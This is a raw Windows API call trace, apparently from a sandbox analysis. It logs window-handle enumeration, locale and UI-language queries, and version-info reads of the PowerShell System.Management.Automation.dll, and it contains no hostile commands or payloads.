	[0464.724] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x16d0
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x16d4
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x15bc
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x15a0
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x159c
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1598
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1594
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1590
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x158c
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1588
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1584
	[0464.724] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1580
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x157c
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1488
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1404
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x11b8
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xbd4
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe0c
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xd30
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe70
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x13b8
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe20
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe2c
	[0464.725] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe00
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe04
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc94
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x13b0
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x13ac
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x13a8
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1374
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x132c
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1328
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x12d0
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x12cc
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x12c8
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1290
	[0464.726] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1218
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1214
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x11ec
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x11e8
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x11cc
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1140
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe6c
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x6e8
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc6c
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf94
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xffc
	[0464.727] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf74
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf08
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf0c
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xed8
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xe90
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xea8
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xfa8
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xfbc
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xfb8
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xfb4
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xfb0
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xfac
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xfc0
	[0464.728] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xfd0
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf88
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf84
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xf80
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xde0
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xddc
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xdd8
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xd34
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xd10
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xd0c
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc9c
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc74
	[0464.729] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc1c
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xc08
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xabc
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x24c
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xbb0
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xbfc
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb10
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x374
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x368
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb28
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xae8
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb14
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x95c
	[0464.730] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa8c
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x46c
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb3c
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa90
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xad0
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa9c
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xaa0
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb1c
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x7e0
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa74
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x694
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xa28
	[0464.731] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x9b0
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x8d8
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x940
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x93c
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4ec
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x150
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x720
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x3c4
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x7d4
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x6c8
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb54
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb54
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb5c
	[0464.732] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x838
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x818
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x5b8
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x494
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x1ec
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x440
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x7e8
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x730
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x2c8
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x31c
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x330
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x128
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x5c8
	[0464.733] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x6f8
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x358
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x73c
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0xb0
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x250
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x240
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x790
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x61c
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x568
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x538
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x540
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x460
	[0464.734] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x79c
	[0464.735] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x14d9c0 | out: lpdwProcessId=0x14d9c0) returned 0x4e0
	[0464.738] WerSetFlags () returned 0x0
	[0465.478] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0465.478] CoTaskMemFree (pv=0x0) 
	[0465.478] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14dd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14dd20 | out: pulNumLanguages=0x14dd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x14dd20) returned 1
	[0465.479] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x14dd28, pwszLanguagesBuffer=0x2bc0910, pcchLanguagesBuffer=0x14dd20 | out: pulNumLanguages=0x14dd28, pwszLanguagesBuffer=0x2bc0910, pcchLanguagesBuffer=0x14dd20) returned 1
	[0465.483] CoTaskMemAlloc (cb=0x24) returned 0x3bafa0
	[0465.483] GetUserDefaultLocaleName (in: lpLocaleName=0x3bafa0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0465.483] CoTaskMemFree (pv=0x3bafa0) 
	[0465.504] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0465.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.504] CoTaskMemFree (pv=0x3ad740) 
	[0465.505] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0465.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.506] CoTaskMemFree (pv=0x3ad740) 
	[0465.507] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0465.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0465.507] CoTaskMemFree (pv=0x3ad740) 
	[0465.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0465.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0465.516] SetErrorMode (uMode=0x1) returned 0x1
	[0465.516] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x14d9a0 | out: lpFileInformation=0x14d9a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0465.516] SetErrorMode (uMode=0x1) returned 0x1
	[0465.516] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x14dc10 | out: lpdwHandle=0x14dc10) returned 0x94c
	[0465.517] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bc41a0 | out: lpData=0x2bc41a0) returned 1
	[0465.517] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14db88, puLen=0x14db80 | out: lplpBuffer=0x14db88*=0x2bc423c, puLen=0x14db80) returned 1
	[0465.517] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x2bc4318, puLen=0x14daf0) returned 1
	[0465.517] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0465.517] CoTaskMemAlloc (cb=0x2e) returned 0x3c8a90
	[0465.517] lstrcpyW (in: lpString1=0x3c8a90, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0465.518] CoTaskMemFree (pv=0x3c8a90) 
	[0465.518] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x2bc436c, puLen=0x14daf0) returned 1
	[0465.518] lstrlenW (lpString="System.Management.Automation") returned 28
	[0465.518] CoTaskMemAlloc (cb=0x3c) returned 0x3c5800
	[0465.518] lstrcpyW (in: lpString1=0x3c5800, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0465.518] CoTaskMemFree (pv=0x3c5800) 
	[0465.518] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x2bc43c8, puLen=0x14daf0) returned 1
	[0465.518] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0465.518] CoTaskMemAlloc (cb=0x20) returned 0x3c2730
	[0465.518] lstrcpyW (in: lpString1=0x3c2730, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0465.518] CoTaskMemFree (pv=0x3c2730) 
	[0465.518] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x2bc4408, puLen=0x14daf0) returned 1
	[0465.518] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0465.518] CoTaskMemAlloc (cb=0x44) returned 0x3c5800
	[0465.518] lstrcpyW (in: lpString1=0x3c5800, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0465.518] CoTaskMemFree (pv=0x3c5800) 
	[0465.518] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x2bc4470, puLen=0x14daf0) returned 1
	[0465.518] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0465.518] CoTaskMemAlloc (cb=0x76) returned 0x36f330
	[0465.518] lstrcpyW (in: lpString1=0x36f330, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0465.518] CoTaskMemFree (pv=0x36f330) 
	[0465.518] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x2bc450c, puLen=0x14daf0) returned 1
	[0465.518] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0465.518] CoTaskMemAlloc (cb=0x44) returned 0x3c5800
	[0465.518] lstrcpyW (in: lpString1=0x3c5800, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0465.518] CoTaskMemFree (pv=0x3c5800) 
